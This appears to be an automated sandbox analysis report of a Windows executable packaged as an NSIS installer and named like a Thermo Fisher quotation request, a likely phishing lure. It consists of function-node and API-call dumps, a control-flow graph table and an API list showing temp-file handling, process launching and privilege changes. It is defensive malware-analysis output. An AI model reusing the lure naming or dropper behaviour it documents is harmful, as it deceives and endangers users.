5591 401d82 5592 402da9 21 API calls 5591->5592 5593 401d93 SetWindowLongW 5592->5593 5594 402c4f 5593->5594 4162 401f03 4163 402da9 21 API calls 4162->4163 4164 401f09 4163->4164 4165 402da9 21 API calls 4164->4165 4166 401f15 4165->4166 4167 401f21 ShowWindow 4166->4167 4168 401f2c EnableWindow 4166->4168 4169 402c4f 4167->4169 4168->4169 5595 401503 5596 40152e 5595->5596 5597 401508 5595->5597 5598 402da9 21 API calls 5597->5598 5598->5596 5599 402903 5600 40290b 5599->5600 5601 40290f FindNextFileW 5600->5601 5604 402921 5600->5604 5602 402968 5601->5602 5601->5604 5605 406554 lstrcpynW 5602->5605 5605->5604 5606 401588 5607 402bc9 5606->5607 5610 40649b wsprintfW 5607->5610 5609 402bce 5610->5609 5611 404609 lstrcpynW lstrlenW 5612 40198d 5613 402da9 21 API calls 5612->5613 5614 401994 5613->5614 5615 402da9 21 API calls 5614->5615 5616 4019a1 5615->5616 5617 402dcb 21 API calls 5616->5617 5618 4019b8 lstrlenW 5617->5618 5620 4019c9 5618->5620 5619 401a0a 5620->5619 5624 406554 lstrcpynW 5620->5624 5622 4019fa 5622->5619 5623 4019ff lstrlenW 5622->5623 5623->5619 5624->5622 5625 40168f 5626 402dcb 21 API calls 5625->5626 5627 401695 5626->5627 5628 4068b1 2 API calls 5627->5628 5629 40169b 5628->5629 5630 402b10 5631 402da9 21 API calls 5630->5631 5634 402b16 5631->5634 5632 406591 21 API calls 5633 402953 5632->5633 5634->5632 5634->5633 4244 402711 4245 402da9 21 API calls 4244->4245 4248 402720 4245->4248 4246 40285d 4247 40276a ReadFile 4247->4246 4247->4248 4248->4246 4248->4247 4249 402803 4248->4249 4251 4027aa MultiByteToWideChar 4248->4251 4252 40285f 4248->4252 4255 4027d0 SetFilePointer MultiByteToWideChar 4248->4255 4257 402870 4248->4257 4267 4060c7 ReadFile 4248->4267 4249->4246 4249->4248 4258 406125 SetFilePointer 4249->4258 4251->4248 4269 40649b wsprintfW 4252->4269 4255->4248 4256 402891 SetFilePointer 4256->4246 4257->4246 4257->4256 4259 406141 4258->4259 4266 406159 4258->4266 4260 4060c7 ReadFile 4259->4260 4261 40614d 4260->4261 4262 406162 SetFilePointer 4261->4262 4263 40618a SetFilePointer 4261->4263 4261->4266 4262->4263 4264 40616d 4262->4264 4263->4266 4270 4060f6 WriteFile 4264->4270 4266->4249 4268 4060e5 4267->4268 4268->4248 4269->4246 4271 406114 4270->4271 4271->4266 5635 401491 5636 4055d9 28 API calls 5635->5636 5637 401498 5636->5637 5638 404692 5640 4047c4 5638->5640 5642 4046aa 5638->5642 5639 40482e 5641 4048f8 5639->5641 5643 404838 GetDlgItem 5639->5643 5640->5639 5640->5641 5647 4047ff GetDlgItem SendMessageW 5640->5647 5649 40453a 8 API calls 5641->5649 5644 4044d3 22 API calls 5642->5644 5645 404852 5643->5645 5646 4048b9 5643->5646 5648 404711 5644->5648 5645->5646 5654 404878 SendMessageW LoadCursorW SetCursor 5645->5654 5646->5641 5650 4048cb 5646->5650 5671 4044f5 KiUserCallbackDispatcher 5647->5671 5652 4044d3 22 API calls 5648->5652 5653 4048f3 5649->5653 5656 4048e1 5650->5656 5657 4048d1 SendMessageW 5650->5657 5659 40471e CheckDlgButton 5652->5659 5672 404941 5654->5672 5656->5653 5661 4048e7 SendMessageW 5656->5661 5657->5656 5658 404829 5662 40491d SendMessageW 5658->5662 5669 4044f5 KiUserCallbackDispatcher 5659->5669 5661->5653 5662->5639 5664 40473c GetDlgItem 5670 404508 SendMessageW 5664->5670 5666 404752 SendMessageW 5667 404778 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5666->5667 5668 40476f GetSysColor 5666->5668 5667->5653 5668->5667 5669->5664 5670->5666 5671->5658 5675 405b7a ShellExecuteExW 5672->5675 5674 4048a7 LoadCursorW SetCursor 5674->5646 5675->5674 4468 401794 4469 402dcb 21 API calls 4468->4469 4470 40179b 4469->4470 4471 4017c3 4470->4471 4472 4017bb 4470->4472 4529 406554 lstrcpynW 4471->4529 4528 406554 lstrcpynW 4472->4528 4475 4017c1 4478 406802 5 API calls 4475->4478 4476 4017ce 4530 405e23 lstrlenW CharPrevW 4476->4530 4482 4017e0 4478->4482 4481 40181c 4536 40601f GetFileAttributesW 4481->4536 4482->4481 4485 4017f2 CompareFileTime 4482->4485 4486 4018b2 4482->4486 4488 401889 4482->4488 4491 406554 lstrcpynW 4482->4491 4495 406591 21 API calls 4482->4495 4502 405bb4 MessageBoxIndirectW 4482->4502 4507 406044 GetFileAttributesW CreateFileW 4482->4507 4533 4068b1 FindFirstFileW 4482->4533 4485->4482 4487 4055d9 28 API calls 4486->4487 4489 4018bc 4487->4489 4490 4055d9 28 API calls 4488->4490 4505 40189e 4488->4505 4508 4032d9 4489->4508 4490->4505 4491->4482 4494 4018e3 SetFileTime 4496 4018f5 CloseHandle 4494->4496 4495->4482 4497 401906 4496->4497 4496->4505 4498 40190b 4497->4498 4499 40191e 4497->4499 4500 406591 21 API calls 4498->4500 4501 406591 21 API calls 4499->4501 4503 401913 lstrcatW 4500->4503 4504 401926 4501->4504 4502->4482 4503->4504 4504->4505 4506 405bb4 MessageBoxIndirectW 4504->4506 4506->4505 4507->4482 4510 4032f2 4508->4510 4509 403320 4539 4034d1 4509->4539 4510->4509 4542 4034e7 SetFilePointer 4510->4542 4514 40346a 4516 4034ac 4514->4516 4521 40346e 4514->4521 4515 40333d GetTickCount 4517 4018cf 4515->4517 4524 403369 4515->4524 4519 4034d1 ReadFile 4516->4519 4517->4494 4517->4496 4518 4034d1 ReadFile 4518->4524 4519->4517 4520 4034d1 ReadFile 4520->4521 4521->4517 4521->4520 4522 4060f6 WriteFile 4521->4522 4522->4521 4523 4033bf GetTickCount 4523->4524 4524->4517 4524->4518 4524->4523 4525 4033e4 MulDiv wsprintfW 4524->4525 4527 4060f6 WriteFile 4524->4527 4526 4055d9 28 API calls 4525->4526 4526->4524 4527->4524 4528->4475 4529->4476 4531 4017d4 lstrcatW 4530->4531 4532 405e3f lstrcatW 4530->4532 4531->4475 4532->4531 4534 4068d2 4533->4534 4535 4068c7 FindClose 4533->4535 4534->4482 4535->4534 4537 406031 SetFileAttributesW 4536->4537 4538 40603e 4536->4538 4537->4538 4538->4482 4540 4060c7 ReadFile 4539->4540 4541 40332b 4540->4541 4541->4514 4541->4515 4541->4517 4542->4509 5676 401a97 5677 402da9 21 API calls 5676->5677 5678 401aa0 5677->5678 5679 402da9 21 API calls 5678->5679 5680 401a45 5679->5680 4561 405718 4562 4058c2 4561->4562 4563 405739 GetDlgItem GetDlgItem GetDlgItem 4561->4563 4564 4058f3 4562->4564 4565 4058cb GetDlgItem CreateThread CloseHandle 4562->4565 4607 404508 SendMessageW 4563->4607 4568 40591e 4564->4568 4569 405943 4564->4569 4570 40590a ShowWindow ShowWindow 4564->4570 4565->4564 4610 4056ac OleInitialize 4565->4610 4567 4057a9 4573 4057b0 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4567->4573 4571 40592a 4568->4571 4572 40597e 4568->4572 4577 40453a 8 API calls 4569->4577 4609 404508 SendMessageW 4570->4609 4575 405932 4571->4575 4576 405958 ShowWindow 4571->4576 4572->4569 4580 40598c SendMessageW 4572->4580 4578 405802 SendMessageW SendMessageW 4573->4578 4579 40581e 4573->4579 4581 4044ac SendMessageW 4575->4581 4583 405978 4576->4583 4584 40596a 4576->4584 4582 405951 4577->4582 4578->4579 4586 405831 4579->4586 4587 405823 SendMessageW 4579->4587 4580->4582 4588 4059a5 CreatePopupMenu 4580->4588 4581->4569 4585 4044ac SendMessageW 4583->4585 4589 4055d9 28 API calls 4584->4589 4585->4572 4591 4044d3 22 API calls 4586->4591 4587->4586 4590 406591 21 API calls 4588->4590 4589->4583 4592 4059b5 AppendMenuW 4590->4592 4593 405841 4591->4593 4594 4059d2 GetWindowRect 4592->4594 4595 4059e5 TrackPopupMenu 4592->4595 4596 40584a ShowWindow 4593->4596 4597 40587e GetDlgItem SendMessageW 4593->4597 4594->4595 4595->4582 4598 405a00 4595->4598 4599 405860 ShowWindow 4596->4599 4602 40586d 4596->4602 4597->4582 4600 4058a5 SendMessageW SendMessageW 4597->4600 4601 405a1c SendMessageW 4598->4601 4599->4602 4600->4582 4601->4601 4603 405a39 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4601->4603 4608 404508 SendMessageW 4602->4608 4605 405a5e SendMessageW 4603->4605 4605->4605 4606 405a87 GlobalUnlock SetClipboardData CloseClipboard 4605->4606 4606->4582 4607->4567 4608->4597 4609->4568 4611 40451f SendMessageW 4610->4611 4612 4056cf 4611->4612 4615 4056f6 4612->4615 4616 401389 2 API calls 4612->4616 4613 40451f SendMessageW 4614 405708 OleUninitialize 4613->4614 4615->4613 4616->4612 4617 401598 4618 4015b1 4617->4618 4619 4015a8 ShowWindow 4617->4619 4620 402c4f 4618->4620 4621 4015bf ShowWindow 4618->4621 4619->4618 4621->4620 4622 402419 4623 402dcb 21 API calls 4622->4623 4624 402428 4623->4624 4625 402dcb 21 API calls 4624->4625 4626 402431 4625->4626 4627 402dcb 21 API calls 4626->4627 4628 40243b GetPrivateProfileStringW 4627->4628 5681 404d1a 5682 404d46 5681->5682 5683 404d2a 5681->5683 5685 404d79 5682->5685 5686 404d4c SHGetPathFromIDListW 5682->5686 5692 405b98 GetDlgItemTextW 5683->5692 5688 404d5c 5686->5688 5691 404d63 SendMessageW 5686->5691 5687 404d37 SendMessageW 5687->5682 5689 40140b 2 API calls 5688->5689 5689->5691 5691->5685 5692->5687 5693 6fe7103d 5696 6fe7101b 5693->5696 5697 6fe715b6 GlobalFree 5696->5697 5698 6fe71020 5697->5698 5699 6fe71027 GlobalAlloc 5698->5699 5700 6fe71024 5698->5700 5699->5700 5701 6fe715dd 3 API calls 5700->5701 5702 6fe7103b 5701->5702 5703 40201b 5704 402dcb 21 API calls 5703->5704 5705 402022 5704->5705 5706 4068b1 2 API calls 5705->5706 5707 402028 5706->5707 5709 402039 5707->5709 5710 40649b wsprintfW 5707->5710 5710->5709 5711 401b9c 5712 402dcb 21 API calls 5711->5712 5713 401ba3 5712->5713 5714 402da9 21 API calls 5713->5714 5715 401bac wsprintfW 5714->5715 5716 402c4f 5715->5716 5717 40149e 5718 4023c2 5717->5718 5719 4014ac PostQuitMessage 5717->5719 5719->5718 5720 4016a0 5721 402dcb 21 API calls 5720->5721 5722 4016a7 5721->5722 5723 402dcb 21 API calls 5722->5723 5724 4016b0 5723->5724 5725 402dcb 21 API calls 5724->5725 5726 4016b9 MoveFileW 5725->5726 5727 4016cc 5726->5727 5733 4016c5 5726->5733 5729 4068b1 2 API calls 5727->5729 5731 40231b 5727->5731 5728 401423 28 API calls 5728->5731 5730 4016db 5729->5730 5730->5731 5732 406314 40 API calls 5730->5732 5732->5733 5733->5728 5734 4029a3 5756 406044 GetFileAttributesW CreateFileW 5734->5756 5736 4029aa 5737 402a60 5736->5737 5740 4029c5 GlobalAlloc 5736->5740 5741 402a48 5736->5741 5738 402a67 DeleteFileW 5737->5738 5739 402a7a 5737->5739 5738->5739 5740->5741 5742 4029de 5740->5742 5743 4032d9 35 API calls 5741->5743 5757 4034e7 SetFilePointer 5742->5757 5745 402a55 CloseHandle 5743->5745 5745->5737 5746 4029e4 5747 4034d1 ReadFile 5746->5747 5748 4029ed GlobalAlloc 5747->5748 5749 402a31 5748->5749 5750 4029fd 5748->5750 5752 4060f6 WriteFile 5749->5752 5751 4032d9 35 API calls 5750->5751 5755 402a0a 5751->5755 5753 402a3d GlobalFree 5752->5753 5753->5741 5754 402a28 GlobalFree 5754->5749 5755->5754 5756->5736 5757->5746 5758 401a24 5759 402dcb 21 API calls 5758->5759 5760 401a2b 5759->5760 5761 402dcb 21 API calls 5760->5761 5762 401a34 5761->5762 5763 401a3b lstrcmpiW 5762->5763 5764 401a4d lstrcmpW 5762->5764 5765 401a41 5763->5765 5764->5765 5766 402324 5767 402dcb 21 API calls 5766->5767 5768 40232a 5767->5768 5769 402dcb 21 API calls 5768->5769 5770 402333 5769->5770 5771 402dcb 21 API calls 5770->5771 5772 40233c 5771->5772 5773 4068b1 2 API calls 5772->5773 5774 402345 5773->5774 5775 402356 lstrlenW lstrlenW 5774->5775 5779 402349 5774->5779 5777 4055d9 28 API calls 5775->5777 5776 4055d9 28 API calls 5780 402351 5776->5780 5778 402394 SHFileOperationW 5777->5778 5778->5779 5778->5780 5779->5776 5779->5780 5781 401da6 5782 401db9 GetDlgItem 5781->5782 5783 401dac 5781->5783 5785 401db3 5782->5785 5784 402da9 21 API calls 5783->5784 5784->5785 5786 401dfa GetClientRect LoadImageW SendMessageW 5785->5786 5787 402dcb 21 API calls 5785->5787 5789 401e58 5786->5789 5791 401e64 5786->5791 5787->5786 5790 401e5d DeleteObject 5789->5790 5789->5791 5790->5791 5792 6fe71000 5793 6fe7101b 5 API calls 5792->5793 5794 6fe71019 5793->5794 5795 4023a8 5796 4023af 5795->5796 5799 4023c2 5795->5799 5797 406591 21 API calls 5796->5797 5798 4023bc 5797->5798 5798->5799 5800 405bb4 MessageBoxIndirectW 5798->5800 5800->5799 5801 402c2a SendMessageW 5802 402c44 InvalidateRect 5801->5802 5803 402c4f 5801->5803 5802->5803 5804 6fe7170d 5805 6fe715b6 GlobalFree 5804->5805 5807 6fe71725 5805->5807 5806 6fe7176b GlobalFree 5807->5806 5808 6fe71740 5807->5808 5809 6fe71757 VirtualFree 5807->5809 5808->5806 5809->5806 4780 40352f SetErrorMode GetVersionExW 4781 403583 GetVersionExW 4780->4781 4782 4035bb 4780->4782 4781->4782 4783 403612 4782->4783 4784 406948 5 API calls 4782->4784 4785 4068d8 3 API calls 4783->4785 4784->4783 4786 403628 lstrlenA 4785->4786 4786->4783 4787 403638 4786->4787 4788 406948 5 API calls 4787->4788 4789 40363f 4788->4789 4790 406948 5 API calls 4789->4790 4791 403646 4790->4791 4792 406948 5 API calls 4791->4792 4793 403652 #17 OleInitialize SHGetFileInfoW 4792->4793 4868 406554 lstrcpynW 4793->4868 4796 4036a1 GetCommandLineW 4869 406554 lstrcpynW 4796->4869 4798 4036b3 4799 405e50 CharNextW 4798->4799 4800 4036d9 CharNextW 4799->4800 4808 4036eb 4800->4808 4801 4037ed 4802 403801 GetTempPathW 4801->4802 4870 4034fe 4802->4870 4804 403819 4805 403873 DeleteFileW 4804->4805 4806 40381d GetWindowsDirectoryW lstrcatW 4804->4806 4880 4030a2 GetTickCount GetModuleFileNameW 4805->4880 4809 4034fe 12 API calls 4806->4809 4807 405e50 CharNextW 4807->4808 4808->4801 4808->4807 4814 4037ef 4808->4814 4811 403839 4809->4811 4811->4805 4813 40383d GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4811->4813 4812 403887 4820 405e50 CharNextW 4812->4820 4851 40392e 4812->4851 4859 40393e 4812->4859 4815 4034fe 12 API calls 4813->4815 4964 406554 lstrcpynW 4814->4964 4818 40386b 4815->4818 4818->4805 4818->4859 4834 4038a6 4820->4834 4822 403ab0 4825 403b34 ExitProcess 4822->4825 4826 403ab8 GetCurrentProcess OpenProcessToken 4822->4826 4823 403a8c 4824 405bb4 MessageBoxIndirectW 4823->4824 4832 403a9a ExitProcess 4824->4832 4827 403ad0 LookupPrivilegeValueW AdjustTokenPrivileges 4826->4827 4828 403b04 4826->4828 4827->4828 4835 406948 5 API calls 4828->4835 4829 403904 4836 405f2b 18 API calls 4829->4836 4830 403947 4833 405b1f 5 API calls 4830->4833 4837 40394c lstrlenW 4833->4837 4834->4829 4834->4830 4838 403b0b 4835->4838 4839 403910 4836->4839 4967 406554 lstrcpynW 4837->4967 4841 403b20 ExitWindowsEx 4838->4841 4843 403b2d 4838->4843 4839->4859 4965 406554 lstrcpynW 4839->4965 4841->4825 4841->4843 4842 403966 4848 40397e 4842->4848 4968 406554 lstrcpynW 4842->4968 4845 40140b 2 API calls 4843->4845 4845->4825 4846 403923 4966 406554 lstrcpynW 4846->4966 4850 4039a4 wsprintfW 4848->4850 4866 4039d0 4848->4866 4852 406591 21 API calls 4850->4852 4908 403c26 4851->4908 4852->4848 4853 405aa8 2 API calls 4853->4866 4854 405b02 2 API calls 4854->4866 4855 4039e0 GetFileAttributesW 4857 4039ec DeleteFileW 4855->4857 4855->4866 4856 403a1a SetCurrentDirectoryW 4858 406314 40 API calls 4856->4858 4857->4866 4860 403a29 CopyFileW 4858->4860 4969 403b4c 4859->4969 4860->4859 4860->4866 4861 405c60 71 API calls 4861->4866 4862 406314 40 API calls 4862->4866 4863 406591 21 API calls 4863->4866 4864 405b37 2 API calls 4864->4866 4865 403aa2 CloseHandle 4865->4859 4866->4848 4866->4850 4866->4853 4866->4854 4866->4855 4866->4856 4866->4859 4866->4861 4866->4862 4866->4863 4866->4864 4866->4865 4867 4068b1 2 API calls 4866->4867 4867->4866 4868->4796 4869->4798 4871 406802 5 API calls 4870->4871 4872 40350a 4871->4872 4873 403514 4872->4873 4874 405e23 3 API calls 4872->4874 4873->4804 4875 40351c 4874->4875 4876 405b02 2 API calls 4875->4876 4877 403522 4876->4877 4878 406073 2 API calls 4877->4878 4879 40352d 4878->4879 4879->4804 4976 406044 GetFileAttributesW CreateFileW 4880->4976 4882 4030e2 4903 4030f2 4882->4903 4977 406554 lstrcpynW 4882->4977 4884 403108 4885 405e6f 2 API calls 4884->4885 4886 40310e 4885->4886 4978 406554 lstrcpynW 4886->4978 4888 403119 GetFileSize 4889 403213 4888->4889 4900 403130 4888->4900 4979 40303e 4889->4979 4891 40321c 4893 40324c GlobalAlloc 4891->4893 4891->4903 4991 4034e7 SetFilePointer 4891->4991 4892 4034d1 ReadFile 4892->4900 4990 4034e7 SetFilePointer 4893->4990 4894 40327f 4898 40303e 6 API calls 4894->4898 4897 403267 4902 4032d9 35 API calls 4897->4902 4898->4903 4899 403235 4901 4034d1 ReadFile 4899->4901 4900->4889 4900->4892 4900->4894 4900->4903 4904 40303e 6 API calls 4900->4904 4905 403240 4901->4905 4906 403273 4902->4906 4903->4812 4904->4900 4905->4893 4905->4903 4906->4903 4906->4906 4907 4032b0 SetFilePointer 4906->4907 4907->4903 4909 406948 5 API calls 4908->4909 4910 403c3a 4909->4910 4911 403c40 4910->4911 4912 403c52 4910->4912 5000 40649b wsprintfW 4911->5000 4913 406422 3 API calls 4912->4913 4914 403c82 4913->4914 4916 403ca1 lstrcatW 4914->4916 4918 406422 3 API calls 4914->4918 4917 403c50 4916->4917 4992 403efc 4917->4992 4918->4916 4921 405f2b 18 API calls 4922 403cd3 4921->4922 4923 403d67 4922->4923 4925 406422 3 API calls 4922->4925 4924 405f2b 18 API calls 4923->4924 4926 403d6d 4924->4926 4927 403d05 4925->4927 4928 403d7d LoadImageW 4926->4928 4929 406591 21 API calls 4926->4929 4927->4923 4932 403d26 lstrlenW 4927->4932 4936 405e50 CharNextW 4927->4936 4930 403e23 4928->4930 4931 403da4 RegisterClassW 4928->4931 4929->4928 4935 40140b 2 API calls 4930->4935 4933 403e2d 4931->4933 4934 403dda SystemParametersInfoW CreateWindowExW 4931->4934 4937 403d34 lstrcmpiW 4932->4937 4938 403d5a 4932->4938 4933->4859 4934->4930 4939 403e29 4935->4939 4941 403d23 4936->4941 4937->4938 4942 403d44 GetFileAttributesW 4937->4942 4940 405e23 3 API calls 4938->4940 4939->4933 4943 403efc 22 API calls 4939->4943 4944 403d60 4940->4944 4941->4932 4945 403d50 4942->4945 4946 403e3a 4943->4946 5001 406554 lstrcpynW 4944->5001 4945->4938 4948 405e6f 2 API calls 4945->4948 4949 403e46 ShowWindow 4946->4949 4950 403ec9 4946->4950 4948->4938 4952 4068d8 3 API calls 4949->4952 4951 4056ac 5 API calls 4950->4951 4953 403ecf 4951->4953 4954 403e5e 4952->4954 4955 403ed3 4953->4955 4956 403eeb 4953->4956 4957 403e6c GetClassInfoW 4954->4957 4959 4068d8 3 API calls 4954->4959 4955->4933 4962 40140b 2 API calls 4955->4962 4958 40140b 2 API calls 4956->4958 4960 403e80 GetClassInfoW RegisterClassW 4957->4960 4961 403e96 DialogBoxParamW 4957->4961 4958->4933 4959->4957 4960->4961 4963 40140b 2 API calls 4961->4963 4962->4933 4963->4933 4964->4802 4965->4846 4966->4851 4967->4842 4968->4848 4970 403b64 4969->4970 4971 403b56 CloseHandle 4969->4971 5003 403b91 4970->5003 4971->4970 4974 405c60 71 API calls 4975 403a7f OleUninitialize 4974->4975 4975->4822 4975->4823 4976->4882 4977->4884 4978->4888 4980 403047 4979->4980 4981 40305f 4979->4981 4982 403050 DestroyWindow 4980->4982 4983 403057 4980->4983 4984 403067 4981->4984 4985 40306f GetTickCount 4981->4985 4982->4983 4983->4891 4986 406984 2 API calls 4984->4986 4987 4030a0 4985->4987 4988 40307d CreateDialogParamW ShowWindow 4985->4988 4989 40306d 4986->4989 4987->4891 4988->4987 4989->4891 4990->4897 4991->4899 4993 403f10 4992->4993 5002 40649b wsprintfW 4993->5002 4995 403f81 4996 403fb5 22 API calls 4995->4996 4998 403f86 4996->4998 4997 403cb1 4997->4921 4998->4997 4999 406591 21 API calls 4998->4999 4999->4998 5000->4917 5001->4923 5002->4995 5004 403b9f 5003->5004 5005 403b69 5004->5005 5006 403ba4 FreeLibrary GlobalFree 5004->5006 5005->4974 5006->5005 5006->5006 5007 4024af 5008 402dcb 21 API calls 5007->5008 5009 4024c1 5008->5009 5010 402dcb 21 API calls 5009->5010 5011 4024cb 5010->5011 5024 402e5b 5011->5024 5014 402c4f 5015 402503 5017 40250f 5015->5017 5019 402da9 21 API calls 5015->5019 5016 402dcb 21 API calls 5018 4024f9 lstrlenW 5016->5018 5020 40252e RegSetValueExW 5017->5020 5021 4032d9 35 API calls 5017->5021 5018->5015 5019->5017 5022 402544 RegCloseKey 5020->5022 5021->5020 5022->5014 5025 402e76 5024->5025 5028 4063ef 5025->5028 5029 4063fe 5028->5029 5030 4024db 5029->5030 5031 406409 RegCreateKeyExW 5029->5031 5030->5014 5030->5015 5030->5016 5031->5030 5032 402930 5033 402dcb 21 API calls 5032->5033 5034 402937 FindFirstFileW 5033->5034 5035 40294a 5034->5035 5036 40295f 5034->5036 5037 402968 5036->5037 5040 40649b wsprintfW 5036->5040 5041 406554 lstrcpynW 5037->5041 5040->5037 5041->5035 5810 401931 5811 401968 5810->5811 5812 402dcb 21 API calls 5811->5812 5813 40196d 5812->5813 5814 405c60 71 API calls 5813->5814 5815 401976 5814->5815 5816 401934 5817 402dcb 21 API calls 5816->5817 5818 40193b 5817->5818 5819 405bb4 MessageBoxIndirectW 5818->5819 5820 401944 5819->5820 5042 4028b6 5043 4028bd 5042->5043 5049 402bce 5042->5049 5044 402da9 21 API calls 5043->5044 5045 4028c4 5044->5045 5046 4028d3 SetFilePointer 5045->5046 5047 4028e3 5046->5047 5046->5049 5050 40649b wsprintfW 5047->5050 5050->5049 5821 401f37 5822 402dcb 21 API calls 5821->5822 5823 401f3d 5822->5823 5824 402dcb 21 API calls 5823->5824 5825 401f46 5824->5825 5826 402dcb 21 API calls 5825->5826 5827 401f4f 5826->5827 5828 402dcb 21 API calls 5827->5828 5829 401f58 5828->5829 5830 401423 28 API calls 5829->5830 5831 401f5f 5830->5831 5838 405b7a ShellExecuteExW 5831->5838 5833 401fa7 5834 4069f3 5 API calls 5833->5834 5836 402953 5833->5836 5835 401fc4 CloseHandle 5834->5835 5835->5836 5838->5833 5839 4014b8 5840 4014be 5839->5840 5841 401389 2 API calls 5840->5841 5842 4014c6 5841->5842 5843 402fb8 5844 402fe3 5843->5844 5845 402fca SetTimer 5843->5845 5846 403038 5844->5846 5847 402ffd MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5844->5847 5845->5844 5847->5846 5848 401d3c 5849 402da9 21 API calls 5848->5849 5850 401d42 IsWindow 5849->5850 5851 401a45 5850->5851

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 40352f-403581 SetErrorMode GetVersionExW 1 403583-4035b3 GetVersionExW 0->1 2 4035bb-4035c0 0->2 1->2 3 4035c2 2->3 4 4035c8-40360a 2->4 3->4 5 40360c-403614 call 406948 4->5 6 40361d 4->6 5->6 12 403616 5->12 8 403622-403636 call 4068d8 lstrlenA 6->8 13 403638-403654 call 406948 * 3 8->13 12->6 20 403665-4036c9 #17 OleInitialize SHGetFileInfoW call 406554 GetCommandLineW call 406554 13->20 21 403656-40365c 13->21 28 4036d2-4036e6 call 405e50 CharNextW 20->28 29 4036cb-4036cd 20->29 21->20 25 40365e 21->25 25->20 32 4037e1-4037e7 28->32 29->28 33 4036eb-4036f1 32->33 34 4037ed 32->34 35 4036f3-4036f8 33->35 36 4036fa-403701 33->36 37 403801-40381b GetTempPathW call 4034fe 34->37 35->35 35->36 38 403703-403708 36->38 39 403709-40370d 36->39 44 403873-40388d DeleteFileW call 4030a2 37->44 45 40381d-40383b GetWindowsDirectoryW lstrcatW call 4034fe 37->45 38->39 42 403713-403719 39->42 43 4037ce-4037dd call 405e50 39->43 47 403733-40376c 42->47 48 40371b-403722 42->48 43->32 61 4037df-4037e0 43->61 66 403893-403899 44->66 67 403a7a-403a8a call 403b4c OleUninitialize 44->67 45->44 64 40383d-40386d GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034fe 45->64 54 403789-4037c3 47->54 55 40376e-403773 47->55 52 403724-403727 48->52 53 403729 48->53 52->47 52->53 53->47 58 4037c5-4037c9 54->58 59 4037cb-4037cd 54->59 55->54 56 403775-40377d 55->56 62 403784 56->62 63 40377f-403782 56->63 58->59 65 4037ef-4037fc call 406554 58->65 59->43 61->32 62->54 63->54 63->62 64->44 64->67 65->37 70 403932-403939 call 403c26 66->70 71 40389f-4038aa call 405e50 66->71 77 403ab0-403ab6 67->77 78 403a8c-403a9c call 405bb4 ExitProcess 67->78 80 40393e-403942 70->80 82 4038f8-403902 71->82 83 4038ac-4038e1 71->83 84 403b34-403b3c 77->84 85 403ab8-403ace GetCurrentProcess OpenProcessToken 77->85 80->67 88 403904-403912 call 405f2b 82->88 89 403947-40396d call 405b1f lstrlenW call 406554 82->89 93 4038e3-4038e7 83->93 90 403b42-403b46 ExitProcess 84->90 91 403b3e 84->91 86 403ad0-403afe LookupPrivilegeValueW AdjustTokenPrivileges 85->86 87 403b04-403b12 call 406948 85->87 86->87 104 403b20-403b2b ExitWindowsEx 87->104 105 403b14-403b1e 87->105 88->67 106 403918-40392e call 406554 * 2 88->106 110 40397e-403996 89->110 111 40396f-403979 call 406554 89->111 91->90 95 4038f0-4038f4 93->95 96 4038e9-4038ee 93->96 95->93 100 4038f6 95->100 96->95 96->100 100->82 104->84 108 403b2d-403b2f call 40140b 104->108 105->104 105->108 106->70 108->84 116 40399b-40399f 110->116 111->110 118 4039a4-4039ce wsprintfW call 406591 116->118 122 4039d0-4039d5 call 405aa8 118->122 123 4039d7 call 405b02 118->123 126 4039dc-4039de 122->126 123->126 128 4039e0-4039ea GetFileAttributesW 126->128 129 403a1a-403a39 SetCurrentDirectoryW call 406314 CopyFileW 126->129 130 403a0b-403a16 128->130 131 4039ec-4039f5 DeleteFileW 128->131 137 403a78 129->137 138 403a3b-403a5c call 406314 call 406591 call 405b37 129->138 130->116 134 403a18 130->134 131->130 133 4039f7-403a09 call 405c60 131->133 133->118 133->130 134->67 137->67 146 403aa2-403aae CloseHandle 138->146 147 403a5e-403a68 138->147 146->137 147->137 148 403a6a-403a72 call 4068b1 147->148 148->118 148->137
                                              APIs
                                              • SetErrorMode.KERNELBASE ref: 00403552
                                              • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040357D
                                              • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00403590
                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 00403629
                                              • #17.COMCTL32(?,?,0000000A,?,?,?,?,?,?,?,?,?), ref: 00403666
                                              • OleInitialize.OLE32(00000000), ref: 0040366D
                                              • SHGetFileInfoW.SHELL32(0079F708,00000000,?,000002B4,00000000), ref: 0040368C
                                              • GetCommandLineW.KERNEL32(007A7260,NSIS Error,?,?,0000000A,?,?,?,?,?,?,?,?,?), ref: 004036A1
                                              • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe",?,"C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe",00000000,?,?,0000000A,?), ref: 004036DA
                                              • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,?,0000000A,?,?,?,?,?,?,?,?,?), ref: 00403812
                                              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,?,0000000A,?,?,?,?,?,?,?,?,?), ref: 00403823
                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,?,0000000A,?,?,?,?,?,?,?,?,?), ref: 0040382F
                                              • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,?,0000000A,?,?,?,?,?,?,?,?,?), ref: 00403843
                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,?,0000000A,?,?,?,?,?,?,?,?,?), ref: 0040384B
                                              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,?,0000000A,?,?,?,?,?,?,?,?,?), ref: 0040385C
                                              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,?,0000000A,?,?,?,?,?,?,?,?,?), ref: 00403864
